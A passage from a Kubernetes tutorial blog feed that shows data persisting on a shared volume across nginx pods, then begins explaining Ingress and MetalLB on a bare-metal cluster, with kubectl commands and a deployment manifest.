&lt;p&gt;Let’s get shell on one of the running containers and go to the mount point then create a file!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ kubectl &lt;span class=&#34;built_in&#34;&gt;exec&lt;/span&gt; --stdin --&lt;span class=&#34;built_in&#34;&gt;tty&lt;/span&gt; nginx-deployment-7976956b49-fgbb4 -- /bin/bash Command Line Prompt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;root@nginx-deployment-7976956b49-fgbb4:/&lt;span class=&#34;comment&#34;&gt;# ls&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;bin  boot  dev  docker-entrypoint.d  docker-entrypoint.sh  etc  home  lib  lib64  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now the shell is opened. Let’s create a file in  &lt;code&gt;/usr/share/nginx/html&lt;/code&gt; :&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;root@nginx-deployment-7976956b49-fgbb4:/&lt;span class=&#34;comment&#34;&gt;# cd /usr/share/nginx/html/&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;We find the file created in the client test xD&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;root@nginx-deployment-7976956b49-fgbb4:/usr/share/nginx/html&lt;span class=&#34;comment&#34;&gt;# ls&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;file&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Create a file named “hi from the other side!”&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;root@nginx-deployment-7976956b49-fgbb4:/usr/share/nginx/html&lt;span class=&#34;comment&#34;&gt;# touch &amp;quot;hi from the other side!&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;root@nginx-deployment-7976956b49-fgbb4:/usr/share/nginx/html&lt;span class=&#34;comment&#34;&gt;# ls&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;file  &lt;span class=&#34;string&#34;&gt;&amp;#x27;hi from the other side!&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Let’s open another shell on another running container:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ kubectl &lt;span class=&#34;built_in&#34;&gt;exec&lt;/span&gt; --stdin --&lt;span class=&#34;built_in&#34;&gt;tty&lt;/span&gt; nginx-deployment-7976956b49-kg5tx -- /bin/bash Command Line Prompt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;root@nginx-deployment-7976956b49-kg5tx:/&lt;span class=&#34;comment&#34;&gt;# cd /usr/share/nginx/html/&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Bingoo! we find the same content on the same share point!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;root@nginx-deployment-7976956b49-kg5tx:/usr/share/nginx/html&lt;span class=&#34;comment&#34;&gt;# ls&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; file  &lt;span class=&#34;string&#34;&gt;&amp;#x27;hi from the other side!&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;root@nginx-deployment-7976956b49-kg5tx:/usr/share/nginx/html&lt;span class=&#34;comment&#34;&gt;# exit&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now we will try to delete the deployment and recreate another to check the data in the  persistent volume&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ kubectl delete -f nginx-deployment.yaml&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;deployment.apps &lt;span class=&#34;string&#34;&gt;&amp;quot;nginx-deployment&amp;quot;&lt;/span&gt; deleted&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ kubectl apply -f nginx-deployment.yaml&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;deployment.apps/nginx-deployment created&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Check the deployment created or not !&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~ kubectl get pods&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME                                READY   STATUS              RESTARTS   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;nginx-deployment-7976956b49-7d5vw   1/1     Running             0          10s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;nginx-deployment-7976956b49-9r5gx   0/1     ContainerCreating   0          10s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;nginx-deployment-7976956b49-fdq7w   1/1     Running             0          10s&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Open another shell on running container from the new deployment to check the content of the persistent volume:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@4n6nk8s-master:~$ kubectl &lt;span class=&#34;built_in&#34;&gt;exec&lt;/span&gt; --stdin --&lt;span class=&#34;built_in&#34;&gt;tty&lt;/span&gt; nginx-deployment-7976956b49-7d5vw -- /bin/bash Command Line Prompt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;root@nginx-deployment-7976956b49-7d5vw:/&lt;span class=&#34;comment&#34;&gt;# cd /usr/share/nginx/html/&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Display the content of the mount point  &lt;code&gt;/usr/share/nginx/html/&lt;/code&gt;&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;root@nginx-deployment-7976956b49-7d5vw:/usr/share/nginx/html&lt;span class=&#34;comment&#34;&gt;# ls&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; file  &lt;span class=&#34;string&#34;&gt;&amp;#x27;hi from the other side!&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;root@nginx-deployment-7976956b49-7d5vw:/usr/share/nginx/html&lt;span class=&#34;comment&#34;&gt;# exit&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;exit&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Bingoo! The content still in the persistent volume without any problem !&lt;/p&gt;
</content>
        <updated>2022-09-10T22:26:58.000Z</updated>
    </entry>
    <entry>
        <id>http://example.com/2022/09/09/Kubernetes/nginx-ingress/</id>
        <title>Deploy Nginx Ingress in Bare-metal Cluster</title>
        <link rel="alternate" href="http://example.com/2022/09/09/Kubernetes/nginx-ingress/"/>
        <content type="html">&lt;h1 id=&#34;ingress-in-bare-metal-kubernetes-cluster&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#ingress-in-bare-metal-kubernetes-cluster&#34;&gt;#&lt;/a&gt; Ingress in bare metal Kubernetes cluster&lt;/h1&gt;
&lt;p&gt;You are working in enterprise that have one cluster with one public IP address and one Domain Name. In our Example  &lt;code&gt;justk8s.k8s&lt;/code&gt; .&lt;br&gt;
That Enterprise want to deploy two web apps for these new service (gym and restaurant) with that single cluster,IP and Domain Name !!&lt;br&gt;
Your task is to deploy these two apps! So you decide to use  &lt;code&gt;Ingress&lt;/code&gt;  because it’s the best solution for this kind of problems!&lt;/p&gt;
&lt;h2 id=&#34;what-is-ingress&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#what-is-ingress&#34;&gt;#&lt;/a&gt; What is Ingress&lt;/h2&gt;
&lt;p&gt;Kubernetes Ingress is an API object that provides routing rules to manage external users’ access to the services in a Kubernetes cluster, typically via HTTPS/HTTP. With Ingress, you can easily set up rules for routing traffic without creating a bunch of Load Balancers or exposing each service on the node&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/rXoZYym.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;h2 id=&#34;ingress-controller&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#ingress-controller&#34;&gt;#&lt;/a&gt; Ingress Controller&lt;/h2&gt;
&lt;p&gt;An Ingress Controller is a Kubernetes controller that is deployed manually to the cluster, most often as a DaemonSet or a Deployment object that runs dedicated Pods for handling incoming traffic load balancing and smart routing. It is responsible for processing the Ingress objects (which specify that they especially want to use the Ingress Controller) and dynamically configuring real routing rules&lt;br&gt;
The most common used Ingress controllerfor Kubernetes is  &lt;code&gt;Ingress Nginx&lt;/code&gt; &lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/P0IubVc.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;h2 id=&#34;ingress-in-cloud-vs-ingress-in-bare-metal-cluster&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#ingress-in-cloud-vs-ingress-in-bare-metal-cluster&#34;&gt;#&lt;/a&gt; Ingress in cloud Vs Ingress in bare metal cluster&lt;/h2&gt;
&lt;p&gt;Deploying Ingress pn managed Kubernetes cluster provided in cloud easier than in bare metal cluster. Because the Ingress Controller must be exposed as LoadBlancer!&lt;/p&gt;
&lt;p&gt;In traditional cloud environments, where network load balancers are available on-demand, a single Kubernetes manifest suffices to provide a single point of contact to the NGINX Ingress controller to external clients and, indirectly, to any application running inside the cluster.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/JM86JeT.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Bare-metal environments lack this commodity, requiring a slightly different setup to offer the same kind of access to external consumers. So we need an aproach to solve this problem !&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/MaTmKew.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;h1 id=&#34;create-load-balancer-proxy-for-bare-metal-cluster&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#create-load-balancer-proxy-for-bare-metal-cluster&#34;&gt;#&lt;/a&gt; Create Load Balancer / Proxy for bare metal cluster&lt;/h1&gt;
&lt;p&gt;There is a lot of method to set up a Load Balancer or Proxy to get Ingress work on our cluster.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We can expose our ingress controller using NodePort service and set up a proxy that forward to this service using a nginx proxy or HA proxy&lt;/li&gt;
&lt;li&gt;We can also install a software solution called  &lt;code&gt;metalLB&lt;/code&gt; . This solution allows to create Load Balancer in local cluster without any problem ! So we can expose our ingress controller using Load Balancer service like in the cloud environment!&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&#34;create-load-balancer-using-metallb&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#create-load-balancer-using-metallb&#34;&gt;#&lt;/a&gt; Create Load Balancer using metalLB:&lt;/h2&gt;
&lt;p&gt;In this demo we will deploy one of the 2 apps and expose it with Load Balancer service for the test purposes. So Let’s start deploying the restaurant app and expose it !&lt;/p&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Restaurant App Deployment&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;apps/v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Deployment&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;4n6nk8s-kitchen&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;replicas:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;selector:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;matchLabels:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;app:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;kitchen&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;template:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;labels:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;app:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;kitchen&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;containers:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;kitchen-app&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;image:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;mohamedrafraf/k8s-kitchen&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;ports:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;containerPort:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;80&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Create the gym app deployment&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf²@4n6nk8s-master$ kubectl apply -f kitchen-deployment.yaml&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;deployment.apps/4n6nk8s-kitchen created&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;raf²@4n6nk8s-master$ kubectl get all&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME                                   READY   STATUS    RESTARTS   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;pod/4n6nk8s-kitchen-698f44db99-29dnr   1/1     Running   0          63s&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Let’s now expose now the deployment:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf²@4n6nk8s-master$ kubectl expose deploy/4n6nk8s-kitchen--type=LoadBalacner --port=80&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;service/4n6nk8s-kitchen created&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Let’s check this service&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf²@4n6nk8s-master$ kubectl get svc&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME              TYPE           CLUSTER-IP       EXTERNAL-IP     PORT(S)        AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s-kitchen   LoadBalancer   10.97.71.78      &amp;lt;pending&amp;gt;       80:30918/TCP   21s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;kubernetes        ClusterIP      10.96.0.1        &amp;lt;none&amp;gt;          443/TCP        5d11h&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;As we see the LoadBalancer service still pending since we don’t have any Load Balancer! Now it’s time to talk about the metalLB !&lt;/p&gt;
&lt;p&gt;MetalLB provides a network load-balancer implementation for Kubernetes clusters that do not run on a supported cloud provider, effectively allowing the usage of LoadBalancer Services within any cluster.&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/Xv7PiiK.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;It’s time to install metalLB. Installing metalLB is so easy we just need to apply two manifest from the official site of &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9tZXRhbGxiLnVuaXZlcnNlLnRmL2luc3RhbGxhdGlvbi8=&#34;&gt;metalLB&lt;/span&gt;&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;kubectl apply -f https://raw.githubusercontent.com/metallb/metallb/v0.12.1/manifests/namespace.yaml&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;kubectl apply -f https://raw.githubusercontent.com/metallb/metallb/v0.12.1/manifests/metallb.yaml&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
